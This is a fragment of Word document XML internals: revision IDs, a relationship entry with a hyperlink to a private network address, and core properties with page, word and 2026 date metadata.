    <w:rsid w:val="00555C21"/>
    <w:rsid w:val="0061567B"/>
    <w:rsid w:val="006A61E5"/>
    <w:rsid w:val="007950B0"/>
    <w:rsid w:val="007E729C"/>
    <w:rsid w:val="00877BCD"/>
    <w:rsid w:val="008D600C"/>
    <w:rsid w:val="0094379E"/>
    <w:rsid w:val="00963BFF"/>
    <w:rsid w:val="009B6754"/>
    <w:rsid w:val="00B634D0"/>
    <w:rsid w:val="00B679BB"/>
    <w:rsid w:val="00CB63C5"/>
    <w:rsid w:val="00CF44D1"/>
    <w:rsid w:val="00DB23D7"/>
    <w:rsid w:val="00EA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7B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7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3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hyperlink" Target="http://192.168.1.10" TargetMode="External"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image57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36</Pages>
  <Words>1030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2026-03-17T12:03:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-18T13:05:00Z</dcterms:modified>
</cp:coreProperties>
</file>